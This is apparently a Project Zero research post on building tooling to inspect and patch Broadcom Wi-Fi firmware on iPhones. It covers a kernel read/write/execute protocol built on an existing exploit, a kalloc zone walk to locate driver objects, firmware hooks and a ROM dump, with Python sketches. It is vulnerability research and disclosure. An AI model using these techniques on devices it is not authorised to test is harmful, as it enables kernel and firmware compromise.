
Over The Air – Vol. 2, Pt. 1: Exploiting The Wi-Fi Stack on Apple Devices

Posted by Gal Beniamini, Project Zero

Earlier this year we performed research into Broadcom’s Wi-Fi stack. Due to the ubiquity of Broadcom’s stack, we chose to conduct our prior research through the lens of one affected family of products -- the Android ecosystem. To paint a more complete picture of the state of Wi-Fi security in the mobile ecosystem, we’ve chosen to revisit the topic - this time through the lens of Apple devices. In this research we’ll perform a deeper dive into each of the affected components, discover new attack surfaces, and finally construct a full over-the-air exploit chain against iPhones, allowing complete control over the target device.

Since there’s much ground to cover, we’ve chosen to split the research into a three-part blog series. The first blog post will focus on exploring the Wi-Fi stack itself and developing the necessary research tools to explore it on the iPhone. In the second blog post, we’ll perform research into the Wi-Fi firmware, discover multiple vulnerabilities, and develop an exploit allowing attackers to execute arbitrary code on the Wi-Fi chip itself, requiring no user-interaction. Lastly, in the final blog post we’ll explore the iPhone’s host isolation mechanisms, research the ways in which the Wi-Fi chip interacts with the host, and develop a fully-fledged exploit allowing attackers to gain complete control over the iOS kernel over-the-air, requiring no user interaction.

As we’ve mentioned before, Broadcom’s chips are present in a wide variety of devices - ranging from mobile phones to laptops (such as Chromebooks) and even Wi-Fi routers. While we’ve chosen to focus our attention on the Apple ecosystem this time around, it’s worth mentioning that the Wi-Fi firmware vulnerabilities presented in this research affect other devices as well. Additionally, as this research deals with a different attack surface in the Wi-Fi firmware, the breadth of affected devices might be wider than that of our prior research.

More concretely, the Wi-Fi vulnerabilities presented in this research affect many devices in the Android ecosystem. For example, two of the vulnerabilities (#1, #2) affect most of Samsung’s flagship devices, including the Galaxy S8, Galaxy S7 Edge and Galaxy S7. Of the two, one vulnerability is also known to affect Google devices such as the Nexus 6P, and some models of Chromebooks. As for Apple’s ecosystem, while this research deals primarily with iPhones, other devices including the Apple TV and Apple Watch are similarly affected by our findings. The exact breadth of other affected devices has not been investigated further, but is assumed to be wider.

We’d also like to note that until hardware host isolation mechanisms are implemented across the Android ecosystem, every exploitable Wi-Fi firmware vulnerability directly results in complete host takeover. In our previous research we identified the lack of host isolation mechanisms on two of the most prominent SoC platforms; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. We are not aware of any advances in this regard, as of yet.

For the purpose of this research, we’ll demonstrate remote code execution on the iPhone 7 (the most recent iDevice at the time of this research), running iOS 10.2 (14C92). The vulnerabilities presented in this research are present in iOS up to (and including) version 10.3.3 (apart from #1, which was fixed in 10.3.3). Researchers wishing to port the provided research tools and exploits to other versions of iOS or to other iDevices would be required to adjust the referenced symbols.

Over the course of the blog post, we’ll begin fleshing out a memory research platform for iOS. Throughout this blog post series, we’ll rely on the framework extensively, to both analyse and explore components on the system, including the XNU kernel, hardware components, and the Wi-Fi chipset itself.

The vulnerabilities affecting Apple devices have been addressed in iOS 11. Similarly, those affecting Android have been addressed in the September bulletin. Note that within the Android ecosystem, OEMs bear the responsibility for providing their own Wi-Fi firmware images (partially due to their high level of customisation). Therefore the corresponding fixes should appear in the vendors’ own bulletins, rather than Android’s security bulletin.

Creating a Research Platform


Before we can begin exploring, we’ll need to lay down the groundwork first. Ideally, we’d like to create our own debugger -- allowing us to both inspect and instrument the Wi-Fi firmware, thereby making exploration (and subsequent exploit development) much easier.

During our previous research into Broadcom’s Wi-Fi chip within the context of the Android ecosystem, this task turned out to be much more straightforward than expected. Instead of having to create an entire research environment from scratch, we relied on several properties provided by the Android ecosystem to speed up the development phase.

For starters, many Android devices allow developers to intentionally bypass their security model, using “rooted” builds (such as userdebug). Flashing such a build onto a device allows us to freely explore and interact with many components on the system. As the security model is only bypassed explicitly, the odds of side-effects resulting from our research affecting the system’s behaviour are rather slim.

Additionally, Broadcom provides their own debugging tools to the Android ecosystem, consisting of a command-line utility and a dedicated set of ioctls within Broadcom’s device driver, bcmdhd. These tools allow sufficiently privileged users to interact with the Wi-Fi chip in a variety of ways, including the ability to access the chip’s RAM directly -- an essential primitive when constructing a debugger. Basing our own toolset on this platform allowed us to create a rather comfortable research environment.

Furthermore, Android utilises the Linux Kernel, which is licensed under GPLv2. Therefore, the kernel’s source code, including that of the device drivers, is freely available. Reading through Broadcom’s device driver (bcmdhd) turned out to be an invaluable resource -- sparing us some unnecessary reverse-engineering while also allowing us to easily assess the ways in which the chip and host interact with one another.

Lastly, some of the data sheets pertaining to the Wi-Fi SoCs used on Android devices were made publicly available by Cypress following their acquisition of Broadcom’s IoT business. While most of the information in the data sheets is irrelevant to our research, we were able to gather a handful of useful clues regarding the architecture of the SoC itself.


Unfortunately, it appears we have no such luck this time around!

First, Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). Consequently, exploring different components within the device is made much more difficult.

Additionally, unlike the Android ecosystem, Apple has chosen to develop their entire host-side stack “from scratch”. Most importantly, the iOS drivers used to interact with Broadcom’s chip are written by Apple, and are not based on Broadcom’s FullMAC drivers (bcmdhd or brcmfmac). Other host-side utilities, such as Broadcom’s debugging toolchain, are thus also not included.

That said, Apple did develop their own mechanisms for accessing and debugging the chip. These capabilities are exposed via a set of privileged ioctls embedded in the IO80211Family driver. While the interface itself is undocumented, reverse-engineering the corresponding components in both the IO80211Family and AppleBCMWLANCore drivers reveals a rather powerful command channel, and one which could possibly be used for the purposes of our research. Unfortunately, access to this interface requires additional entitlements, thus preventing us from leveraging it (unless we escalate our privileges).

Lastly, there’s no overlap between the revisions of Wi-Fi chips used on Apple’s devices and those used in the Android ecosystem. As we’ll see later on, this might be due to the fact that Apple-specific Wi-Fi chips contain Apple-specific features. Regardless, perhaps unsurprisingly, none of the corresponding data sheets for these SoCs have been made available.


So… it appears we’ll have to deal with a proprietary chip, on a proprietary device running a proprietary operating system. We have our work cut out for us! That said, it’s not all doom and gloom; instead of relying on all of the above, we’ll just need to create our own independent research platform.

Acquiring the ROM?


Let’s start by analysing the SoC’s firmware and loading it up into a disassembler. As we’ve seen in the previous round of research, the Wi-Fi firmware consists of a small chunk of ROM containing most of the firmware’s data and code, and a larger blob of RAM housing all of the runtime data structures (such as the heap and stack), as well as patches to the ROM’s code.

Since the RAM blob is loaded into the Wi-Fi chip during its initialisation by the host, it should be accessible via the host’s root filesystem. Indeed, after downloading the iPhone’s firmware image, extracting the root filesystem and searching for indicative strings, we are greeted with the following result:


Great, so we’ve identified the firmware’s RAM. What’s more, it appears that the Wi-Fi chip embedded in the phone is a BCM4355C0, a model which I haven’t come across in Android devices in the past (curiously, it also does not appear on Broadcom’s website).
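Incidentally, the search over the extracted root filesystem is easily scripted. A minimal sketch -- the marker string below is merely illustrative; any chip-identifying substring would do:

```python
import os

def find_firmware_images(rootfs_dir, markers=(b"4355",)):
    """Walk the extracted root filesystem and report files containing
    all of the given chip-identifying marker strings."""
    hits = []
    for dirpath, _, filenames in os.walk(rootfs_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    data = f.read()
            except OSError:
                continue  # unreadable entry -- skip it
            if all(marker in data for marker in markers):
                hits.append(path)
    return hits
```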

Regardless, having the RAM image is all well and good, but what about the ROM? After all, the majority of the code is stored in the chip’s ROM. Even if we were to settle for analysing the RAM alone, it’d be extremely difficult to reverse-engineer independently of the ROM as many of the functions in the former address data stored in the latter. Without knowing the ROM’s contents, or even its rudimentary layout, we’ll have to resort to guesswork.

However, this is where we run into a bit of a snag! To extract the ROM we’ll need to interact with the Wi-Fi chip itself... Whereas on Android we could simply use a “rooted” build to gain elevated privileges, and then access the Wi-Fi SoC via Broadcom’s debugging utilities, there are no comparable mechanisms on the iPhone. In that case, how will we interact with the chip and ultimately extract its ROM?

We could opt for a hardware-based research environment. Reviewing the data sheets for one of Broadcom’s Wi-Fi SoCs, BCM4339, reveals several interfaces through which the chip may be debugged, including UART and a JTAG interface.


That said, there are several disadvantages to this approach. First, we’d need to open up the device, locate the required interfaces, and make sure that we do not damage the phone in the process. Moreover, requiring such a setup for each research device would incur significant start-up overhead. Perhaps most importantly, relying on a hardware-based approach would limit the number of researchers willing to utilise our research platform -- both because hardware work is a relatively specialised skill-set, and because people might (rightly) be wary of causing damage to their own devices.

So what about a completely software-based solution? After all, on Android devices we were able to access the chip’s memory solely using software. Perhaps a similar solution would apply to Apple devices?

To answer this question, let’s trace our way through the Android components involved in the control flow for accessing the Wi-Fi chip’s memory from the host. The flow begins with a user issuing a memory access command via Broadcom’s debugging utility (“membytes”). This, in turn, triggers an ioctl to Broadcom’s driver, requesting the memory access operation. After some processing within the driver, it performs the requested action by directly accessing the chip’s tightly-coupled memory (TCM) from the kernel’s Virtual Address-Space (VAS).

Two Registers Walk Into a BAR


As we’re mostly interested in the latter part, let’s disregard the Android-specific components for now and focus on the mechanism in bcmdhd allowing TCM access from the host.

Reviewing the driver’s code allows us to arrive at the relevant code flow. First, the driver enables the PCIe-connected Wi-Fi chip. Then, it accesses the PCIe Configuration Space to program the Wi-Fi chip’s Base Address Registers (BARs). In keeping with the PCI standards, programming the BARs and mapping them into the host’s address space exposes functionality directly from the Wi-Fi SoC to the host, such as IO-Space or Memory-Space access. Taking a closer look at Broadcom’s chips, they seem to provide two BARs in their configuration space: BAR0 and BAR1.

BAR0 is used to map-in registers corresponding to the different cores on the Wi-Fi SoC, including the ARM processor running the firmware’s logic, and more esoteric components such as the PCIe Gen 2 core on the Wi-Fi SoC. The cores themselves can be selected by accessing the PCIe configuration space once again, and programming the “BAR0 Window” register, directing it at the backplane address corresponding to the requested core.

BAR1, on the other hand, is used solely to map the Wi-Fi chip’s TCM into the host. Since Broadcom’s driver leverages the TCM access capability extensively, it maps-in BAR1 into the kernel’s virtual address space during the device’s initialisation, and doesn’t unmap it until the device shuts down. Once the TCM is mapped into the kernel, all subsequent memory accesses to the chip’s TCM are performed by simply modifying the mapped block within the kernel’s VAS. Any write operations made to the memory-mapped block are automatically reflected to the Wi-Fi chip’s RAM.
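To make the mechanics concrete, here is a sketch of how host-side code could recover the memory BARs’ base addresses from the chip’s raw PCIe configuration space. The offsets come from the standard PCI configuration-space header (on Linux, the raw configuration space is readable from /sys/bus/pci/devices/&lt;dev&gt;/config); this is an illustration, not Broadcom’s or Apple’s actual driver code:

```python
import struct

# Standard PCI configuration-space header: BAR0 lives at offset 0x10,
# with subsequent BARs at 4-byte increments.
PCI_BAR0_OFFSET = 0x10

def parse_memory_bar(cfg, index):
    """Return the base address programmed into memory BAR `index`.

    `cfg` is the device's raw PCI configuration space."""
    off = PCI_BAR0_OFFSET + 4 * index
    (val,) = struct.unpack_from("<I", cfg, off)
    if val & 0x1:
        raise ValueError("BAR %d is an IO-space BAR" % index)
    if (val >> 1) & 0x3 == 0x2:
        # 64-bit memory BAR: the upper half lives in the next dword.
        (hi,) = struct.unpack_from("<I", cfg, off + 4)
        return ((hi << 32) | val) & ~0xF
    # 32-bit memory BAR: mask off the low flag bits.
    return val & ~0xF
```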

This is all well and good, but what about iOS? Since Apple develops their own drivers for interacting with Broadcom’s chips, what holds true in Broadcom’s drivers doesn’t necessarily apply to Apple’s drivers. After all, we could think of many different approaches to accessing the chip’s memory. For example, instead of mapping the entire TCM into the kernel’s memory, they might elect to only map-in certain regions of the TCM, to map it only on-demand, or even to rely on different chip-access mechanisms altogether.

To get to the bottom of this, we’ll need to start reverse-engineering Apple’s drivers. This can be done by extracting the kernelcache from the iPhone’s firmware and loading it into our favourite disassembler. After loading the kernel, we immediately come across two driver KEXTs related to Broadcom’s Wi-Fi chip; AppleBCMWLANCore and AppleBCMWLANBusInterfacePCIe.

Spending some time reverse-engineering the two drivers, it’s quickly evident what their corresponding roles are. AppleBCMWLANCore serves as a high-level driver, dealing mostly with configuring the Wi-Fi chip, handling incoming events, and chip-specific features such as offloading. In keeping with good design practices, the driver is unaware of the interface through which the chip is connected, allowing it to focus solely on the logic required to interact with the chip. In contrast, AppleBCMWLANBusInterfacePCIe serves a complementary role; it is a low-level driver tasked with handling all the PCIe-related communication protocols, dealing with MSI interrupts, and generally everything interface-related.

We’ll revisit the two drivers more in-depth later on, but for now it’s sufficient to say that we have a relatively good idea where to start looking for a potential TCM mapping -- after all, as we’ve seen, the TCM access is performed by mapping the PCIe BARs. Therefore, it would stand to reason that such an operation would be performed by AppleBCMWLANBusInterfacePCIe.

After reverse-engineering much of the driver, we come across a group of suspicious-looking functions that look like candidates for TCM accessors. All the above functions serve the same purpose -- accessing a memory-mapped buffer, differing from one another only in the size of the word used (16, 32, or 64-bit). Anecdotally, the corresponding APIs for TCM access in the Android driver follow the same structure. What’s more, the above functions all reference the string “Memory”... We might be onto something!

Kernel Function 0xFFFFFFF006D1D9F0

Cross-referencing our way up the call-chain, it appears that all of the above functions are methods pertaining to instances of a single class, which incidentally bears the same name as that of the driver: AppleBCMWLANBusInterfacePCIe. Since several functions in the call-chain are virtual functions, we can locate the class’s VTable by searching for 64-bit words containing their addresses within the kernelcache.
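The vtable search itself can be automated with a small helper. Note the heuristics involved: we assume the functions’ addresses appear near one another in the candidate vtable, and the window size below is an arbitrary choice:

```python
import struct

def find_vtable(kernelcache, base_addr, func_addrs, window=0x400):
    """Scan the raw kernelcache for candidate vtables.

    We look for occurrences of the first function's address, accepting a
    candidate if the remaining addresses appear within `window` bytes of
    it. `base_addr` is the virtual address at which the binary loads."""
    needle = struct.pack("<Q", func_addrs[0])
    results = []
    pos = kernelcache.find(needle)
    while pos != -1:
        region = kernelcache[max(0, pos - window): pos + window]
        if all(struct.pack("<Q", addr) in region for addr in func_addrs[1:]):
            results.append(base_addr + pos)
        pos = kernelcache.find(needle, pos + 8)
    return results
```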


To avoid unnecessary confusion between the object above and the driver, we’ll refer to the object from now on as the “PCIe object”, and we’ll refer to the driver by its full name; “AppleBCMWLANBusInterfacePCIe”.

Kernel Memory Analysis Framework


Now that we’ve identified mechanisms in the kernel possibly relating to the Wi-Fi chip’s TCM, our next course of action is to somehow access them. Had we been able to debug the iOS kernel, we could have simply placed a breakpoint on the aforementioned memory access functions, recorded the location of the shared buffer, and then used our debugger to freely access the buffer on our own. However, as it happens, iOS offers no such debugger. Indeed, having such a debugger would allow users to subvert the device’s security model...

Instead, we’ll have to create our own kernel debugger!

Debuggers usually consist of two main pieces of functionality:
  1. The ability to modify the control flow of the program (e.g., by inserting breakpoints)
  2. The ability to inspect (and modify) the data being processed by the program

As it happens, modifying the kernel’s control flow on modern Apple devices (such as the iPhone 7) is far from trivial. These devices include a dedicated hardware component -- Apple’s Memory Cache Controller (AMCC), designed to prevent attackers from modifying the kernel’s code, even in the presence of full control over the kernel itself (i.e., EL1 code execution). While AMCC might make for an interesting research target in its own right, it’s not the main focus of our research at this time. Instead, we’ll have to make do with analysing and modifying the data processed by the kernel.

To gain access to the kernel, we’ll first need to exploit a privilege escalation vulnerability. Luckily, we can forgo all of the complexity involved in developing a functional kernel exploit, and instead rely on some excellent work by Ian Beer.

Earlier this year, Ian developed a fully-functional exploit allowing kernel code execution from any sandboxed process on the system. Upon successful execution, Ian’s exploit provides two primitives - memory-read and memory-write - allowing us to freely explore the kernel’s virtual address-space. Since the exploit was developed against iOS 10.2, we’ll need to use the same version on our target iPhone to utilise it.

To allow for increased flexibility, we’ll aim to design our research platform to be modular; instead of tying the platform to a specific memory access mechanism, we’ll use Ian’s exploit as a “black-box”, only deferring memory accesses to the exploit’s primitives.

Moreover, it’s important that whatever system we build allows us to explore the device comfortably. Thinking about this for a moment, we can boil it down to a few basic requirements:
  1. The analysis should be done on a developer-friendly machine, not on the iPhone
  2. The platform should be scriptable and easily extensible
  3. The platform should be independent of the memory access mechanism used

To prevent any dependence on the memory access mechanism, we’ll implement a rudimentary command protocol, allowing clients to perform read or write operations, as well as offering an “execute” primitive for gadgets within the kernel’s VAS. Next, we’ll insert a small stub implementing this protocol into the exploit, allowing us to interface with the exploit as if it were a “black box”. As for the client, it can be executed on any machine, as long as it’s able to connect to the server stub and communicate using the above protocol.
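A minimal client for such a protocol might look as follows. The opcode values and header layout here are purely illustrative -- the real wire format is whatever the server stub embedded in the exploit defines:

```python
import socket
import struct

# Illustrative opcodes -- the real values are defined by the server stub.
CMD_READ, CMD_WRITE, CMD_EXEC = 1, 2, 3

class KernelClient:
    """Client half of a minimal read/write/execute command protocol.

    Each request is a packed header <opcode, address, length-or-arg>,
    optionally followed by data for writes."""

    def __init__(self, sock):
        self.sock = sock

    def _recv_exact(self, length):
        buf = b""
        while len(buf) < length:
            chunk = self.sock.recv(length - len(buf))
            if not chunk:
                raise EOFError("server closed the connection")
            buf += chunk
        return buf

    def read(self, addr, length):
        self.sock.sendall(struct.pack("<IQQ", CMD_READ, addr, length))
        return self._recv_exact(length)

    def write(self, addr, data):
        self.sock.sendall(struct.pack("<IQQ", CMD_WRITE, addr, len(data)) + data)

    def execute(self, gadget_addr, arg):
        self.sock.sendall(struct.pack("<IQQ", CMD_EXEC, gadget_addr, arg))
        return struct.unpack("<Q", self._recv_exact(8))[0]
```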

A version of Ian Beer’s extra_recipe exploit with the aforementioned server stub can be found on our bug tracker, here.

Lastly, there’s the question of the research platform itself. For convenience’s sake, we’ve decided to develop the framework as a set of Python scripts, not unlike forensics frameworks such as Volatility. We’ll slowly grow the framework as we go along, adding scripts for each new data structure we come across.

Since the iOS kernel relies heavily on dynamic dispatch, the ability to explore the kernel in a shell-like interface allows us to easily resolve virtual call targets by inspecting the virtual pointers in the corresponding objects. We’ll use this ability extensively to assist our static analysis in places where the code is hard to untangle.

Over the course of our research we’ll develop several modules for the analysis framework, allowing interaction with objects within the XNU kernel, parts of IOKit, hardware components, and finally the Wi-Fi chip itself.

Setting Up a Test Network


Moving on, we’ll need to create a segregated test network, consisting of the target iPhone, a single MacBook (which we’ll use to interact with the iPhone), and a Wi-Fi router.

As our memory analysis framework transmits data over the network, both the iPhone and the MacBook must be able to communicate with one another. Additionally, as we’re using Xcode to deploy the exploit from the MacBook to the iPhone, it’d be advantageous if the test network allowed both devices to access the internet (so the developer profile could be verified).

Lastly, we require complete control over all aspects of our Wi-Fi router. This is because the next part of our research will deal extensively with the Wi-Fi layer. As such, we’d like to reserve the ability to inject, modify and drop frames within our network -- primitives which may come in handy later on.

Putting the above requirements together, we arrive at the following basic topology:


In my own lab setup, the role of the Wi-Fi router is fulfilled by my ThinkPad laptop, running Ubuntu 16.04. I’ve connected two SoftMAC TL-WN722N dongles, one for each interface (internal and external). The internal network’s access-point is broadcast using hostapd, and the external interface connects to the internet using wpa_supplicant. Moreover, network-manager is disabled to prevent interference with our configuration.

Note that it’s imperative that the dongle used to broadcast the internal network’s access-point is a SoftMAC device (and not FullMAC) -- this will ensure that the MLME and MAC layers are processed by the host’s software (i.e., by the Linux Kernel and hostapd), allowing us to easily control the data transmitted over those layers.

The laptop is also minimally configured to perform IP forwarding and to serve as a NAT, in order to allow connections from the internal network out into the internet. In addition, I’ve set up both DNS and DHCP servers, to prevent the need for any manual configuration. I also recommend setting up DNS forwarding and blocking Apple’s software-update domains within your network (mesu.apple.com, appldnld.apple.com).

Depending on your work environment, it may be the case that many (or most) Wi-Fi channels are rather crowded, thereby reducing the signal quality substantially. While dropping frames doesn’t normally affect our ability to use the network (frames would simply be re-transmitted), it may certainly cause undesirable effects when attempting to run an over-the-air exploit (as re-transmissions may alter the firmware’s state substantially).

Anecdotally, scanning for nearby networks around my desk revealed around 60 Wi-Fi networks, causing quite a bit of noise (and frame loss). If you encounter the same issue, you can boost your RSSI by building a small cantenna and connecting it to your dongle:


Finding the TCM


Using our test network and memory analysis platform, let’s start exploring the kernel’s VAS!

We’ll begin the hunt by searching for the PCIe object within the kernel. After all, we know that finding the object will allow us to locate the suspect TCM mapping, bringing us closer to our goal of developing a Wi-Fi firmware debugger. Since we’re unable to place breakpoints, we’ll need to locate a “path” leading from a known memory location to that of the PCIe object.

So how will we identify the PCIe object once we come across it? Well, while the C++ standards do not explicitly specify how dynamic dispatch is implemented, most compilers tend to use the same ABI for this purpose -- the first word of every object containing virtual functions serves as a pointer to that object’s virtual table (commonly referred to as the “virtual pointer” or “vptr”). By leveraging this little tidbit, we can build our own object identification mechanism; simply read the first word of each object we come across, and check which virtual table it corresponds to. Since we’ve already located the VTable corresponding to the PCIe object we’re after, all we’d need to do is check each object against that address.
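Expressed in our framework’s terms, the identification mechanism boils down to very little code, with `read64` standing in for the exploit’s memory-read primitive:

```python
def find_instances(read64, candidates, vtable_addr):
    """Return the candidate addresses whose first 64-bit word -- the
    virtual pointer, under the common C++ ABI -- matches the target
    class's vtable address."""
    return [addr for addr in candidates if read64(addr) == vtable_addr]
```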

Now that we know how to identify the object, we can begin searching for it within the kernel. But where should we start? After all, the object could be anywhere in the kernel’s VAS. Perhaps we can gain some more information by taking a look at the object’s constructor. For starters, doing so will allow us to find out which allocator is used to create the object; if we’re lucky, the object may be allocated from a special pool or stored in a static location.

Kernel Function 0xFFFFFFF006D34734

(OSObject’s “new” operator is a wrapper around kalloc - the XNU kernel allocator).

Looking at the code above, it appears that the PCIe object is not allocated from a special pool. Perhaps, instead, the object is addressable through data stored in the driver’s BSS or data segments? If so, then by following every “chain” of pointers originating in the above segments, we should be able to locate a chain terminating at our desired object.

To test out this hypothesis, let’s write a short python script to perform a depth-first search for the object, starting in the driver’s BSS and data segments. The script simply iterates over each 64-bit word and checks whether it appears to be a valid kernel virtual address. If so, it recursively continues the search by following the pointer and its neighbouring pointers (searching both forwards and backwards), stopping only when the maximal search depth is reached (or the object is located).
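A sketch of that search is shown below; `read64` returns None for unmapped addresses, and the address-range check is a simple heuristic for “valid kernel virtual address” rather than an exact test:

```python
def is_kernel_pointer(value):
    # Heuristic range check for iOS kernel virtual addresses.
    return 0xFFFFFFF000000000 <= value < 0xFFFFFFF280000000

def find_chain(read64, roots, target, max_depth=10, window=8):
    """Depth-first search for a pointer chain leading from `roots` (e.g.
    every word in the driver's BSS and data segments) to `target`.

    At each pointer we also scan `window` neighbouring 64-bit slots,
    both forwards and backwards."""
    stack = [(root, (root,)) for root in roots]
    seen = set()
    while stack:
        addr, chain = stack.pop()
        if addr == target:
            return chain
        if addr in seen or len(chain) > max_depth:
            continue
        seen.add(addr)
        for slot in range(-window, window + 1):
            value = read64(addr + slot * 8)
            if value is not None and is_kernel_pointer(value):
                stack.append((value, chain + (value,)))
    return None  # no (sufficiently short) chain found
```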


After running the DFS and following pointers up to 10 levels deep, we find no matching chain. It appears that none of the objects in the BSS or data segments contain a (sufficiently short) pointer chain leading to our target object.

So how should we proceed? Let’s take a moment to consider what we know about the object so far. First, the object is allocated using the XNU kernel allocator, kalloc. We also know the exact size of the allocation (3824 bytes). And, of course, we have a means of identifying the object once located. Perhaps we could inspect the allocator itself to locate the object...

On the one hand, it’s entirely possible that kalloc doesn’t keep track of in-use allocations. If so, tracking down our object would be rather difficult. On the other hand, if kalloc does have a way of identifying past allocations, we can parse its data structures and follow the same logic to identify our object. To get to the bottom of this, let’s download the XNU source code corresponding to this version of iOS, and read through kalloc’s implementation.

After spending some time familiarising ourselves with kalloc’s implementation, we can sketch a high-level view of the allocator’s implementation. Since kalloc is a “zone allocator”, each allocated object is assigned a region from which it is drawn. Individual regions are represented by the zone_t structure, which holds all of the metadata pertaining to the zone.

The allocator’s operation can be roughly split into two phases: identifying the corresponding zone for each allocation, and carving the allocation from the zone. The identification process itself takes on three distinct flows, depending on the size of the requested allocation. Once the target zone is identified, the allocation process proceeds identically for all three flows.

So how are the allocations themselves performed? During zones’ lifetimes, they must keep track of their internal metadata, including the zone’s size, the number of stored elements and many other bits and pieces. More importantly, however, the zone must track the state of the memory pages assigned to it. During the kernel’s lifetime, many objects are allocated and subsequently freed, causing the different zones’ pages to fill up or vacate. If each allocation triggered an iteration over all possible pages while searching for vacancies, kalloc would be quite inefficient. Instead, this is tackled by keeping track of several queues, each denoting the state of the memory pages assigned to the zone.

Among the queues stored in each zone are two queues of particular interest to us:
  • The “intermediate” queue - contains pages with both vacancies and allocated objects.
  • The “all used” queue - contains pages with no vacancies (only filled with objects).

Putting it all together, we can identify allocated objects in kalloc by simply following the same mechanisms as those used by the allocator to locate the target zone. Once we find the matching zone, we’ll parse its queues to locate each allocation made within the zone, stopping only when we reach our target object.
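Schematically, the search looks as follows. The helper that walks a zone’s page queues (`read_page_queue`) is deliberately left abstract, since the zone_t layout is version-specific -- the XNU sources for the target build provide the exact offsets:

```python
PAGE_SIZE = 0x1000

def zone_elements(read_page_queue, elem_size, queues):
    """Enumerate the addresses of elements carved from a kalloc zone.

    `queues` holds the zone's "intermediate" and "all used" page queues;
    `read_page_queue` walks one queue, yielding the base address of each
    page assigned to the zone."""
    for queue in queues:
        for page_base in read_page_queue(queue):
            # Elements are carved consecutively out of each page.
            for offset in range(0, PAGE_SIZE - elem_size + 1, elem_size):
                yield page_base + offset

def find_object(read64, read_page_queue, elem_size, queues, vtable_addr):
    """Locate an allocation whose first word matches the target vtable."""
    for addr in zone_elements(read_page_queue, elem_size, queues):
        if read64(addr) == vtable_addr:
            return addr
    return None
```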

Finally, we can package all of the above into a module in our analysis framework. The module allows us to either manually iterate over zones’ queues, or to locate objects by their virtual table (optionally accepting the allocation size to quickly locate the relevant zone).

Using our new kalloc module, we can search for the PCIe object using the VTable address we found earlier on. After doing so, we are finally greeted with a positive result -- the object is successfully located within the kernel’s VAS! Next, we’ll simply follow the same steps we identified in the memory accessors analysed earlier on, in order to extract the location of the suspected TCM mapping within the kernel.

Since the TCM mapping provides a view into the Wi-Fi chip’s RAM, we’d naturally expect it to begin with the same values as those we had identified in the RAM file extracted from the firmware. Let’s try and read out some of the values from the buffer and see whether it matches the RAM dump:


Great! So we’ve finally found the TCM. This brings us one step closer to acquiring the ROM, and to building a research environment for the Wi-Fi SoC.
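Incidentally, this sanity check is easy to fold into the framework. A minimal sketch, with `read_mem` standing in for our kernel memory-read primitive; since runtime structures (such as the heap) will have diverged from the on-disk image, we expect a high -- but not necessarily perfect -- match rate:

```python
def verify_tcm_mapping(read_mem, tcm_base, ram_dump, length=0x1000):
    """Compare `length` bytes of the suspected TCM mapping against the
    RAM image extracted from the root filesystem, returning the
    fraction of matching bytes."""
    mapped = read_mem(tcm_base, length)
    matches = sum(a == b for a, b in zip(mapped, ram_dump[:length]))
    return matches / float(length)
```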

Acquiring the ROM


The TCM mapping provides a view into the Wi-Fi chip’s RAM. While accessing the RAM is undoubtedly useful (as it allows us to gain visibility into the runtime structures used by the chip, such as the heap’s state), it does not allow us to directly access the chip’s ROM. So why did we go to all of this effort to begin with? Well, while thus far we have only used the mapped TCM buffer to read the Wi-Fi SoC’s RAM, recall that the same mapping also allows us to freely write to it -- any data written to the memory-mapped buffer is automatically reflected back to the Wi-Fi SoC’s RAM.

Therefore, we can leverage our newly acquired write access to the chip’s RAM in order to modify the chip’s behaviour. Perhaps most importantly, we can insert hooks into RAM-resident functions in the firmware, and direct their flow towards our own code chunks. As we’ve already built a patching infrastructure in the previous blog posts, we can incorporate the same code as a module in our analysis framework!

Doing so allows us to provide a convenient interface through which we simply select a target RAM function and provide a corresponding assembly stub, and the framework then proceeds to patch the function on our behalf, direct it into our shellcode to execute our hook (and emulate the original prologue), and finally return back to the original function. The shellcode stub itself is written into the top of the heap’s largest free chunk, allowing us to avoid overwriting any important data structures in the RAM.
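The patching flow above can be modelled on a flat buffer: save the function's prologue, overwrite it with a branch into a free chunk, and place in that chunk a stub that runs the hook, emulates the saved prologue, and branches back. The sketch below is a simplified byte-level model of that layout; the 4-byte "branch" records are fake tag-plus-offset markers, not real ARM encodings:

```python
def install_hook(ram, func_off, stub_off, hook_bytes, prologue_len=4):
    """Install a hook by redirecting func_off into a stub at stub_off.

    ram is a mutable bytearray modelling the chip's RAM. The 'branch'
    here is a fake 4-byte record (tag + 3-byte target offset) rather
    than a real instruction -- the layout, not the encoding, is the point.
    """
    saved_prologue = bytes(ram[func_off:func_off + prologue_len])

    # Stub layout: [hook code][emulated prologue][branch back past the patch]
    stub = bytearray()
    stub += hook_bytes
    stub += saved_prologue
    stub += b"B" + (func_off + prologue_len).to_bytes(3, "little")
    ram[stub_off:stub_off + len(stub)] = stub

    # Overwrite the prologue with a branch into the stub.
    ram[func_off:func_off + prologue_len] = b"B" + stub_off.to_bytes(3, "little")
    return saved_prologue

ram = bytearray(0x100)
ram[0x10:0x14] = b"PROL"                       # pretend prologue
saved = install_hook(ram, 0x10, 0x80, b"HOOK")
assert saved == b"PROL"
assert bytes(ram[0x80:0x88]) == b"HOOKPROL"    # hook, then emulated prologue
assert ram[0x10] == ord("B")                   # function now branches away
```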


Building on this technique, let's insert a hook into a commonly invoked RAM function (such as the chip's “ioctl” handler). Once invoked, our hook will simply copy small “windows” of the ROM into predetermined regions in RAM. Note that since the RAM is only slightly larger than the ROM, we cannot leak the entire ROM in one go, so we'll have to resort to this iterative approach instead. Once a ROM chunk is copied, our shellcode stub signals completion, causing the host to extract the leaked ROM contents and notify the stub that the next chunk of ROM may be leaked.
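Host-side, the iterative leak amounts to a request/poll/extract loop. The sketch below models the protocol with an in-process "chip" object standing in for the hooked firmware (the real implementation triggers the hook and polls a completion flag through the mapped TCM; all sizes here are hypothetical):

```python
ROM_SIZE = 0xA0000   # hypothetical ROM size for the model
WINDOW   = 0x4000    # size of each leaked chunk

class FakeChip:
    """Stands in for the hooked firmware: copies ROM windows on demand."""
    def __init__(self, rom):
        self.rom = rom
        self.window = b""
        self.done = False

    def request(self, offset, size):
        # In reality the hook copies a ROM window into a fixed RAM region
        # and raises a completion flag that the host polls via the TCM.
        self.window = self.rom[offset:offset + size]
        self.done = True

def dump_rom(chip, rom_size=ROM_SIZE, window=WINDOW):
    out = bytearray()
    for off in range(0, rom_size, window):
        chip.done = False
        chip.request(off, window)   # trigger the hook
        while not chip.done:        # poll the completion flag
            pass
        out += chip.window          # extract the leaked chunk
    return bytes(out)

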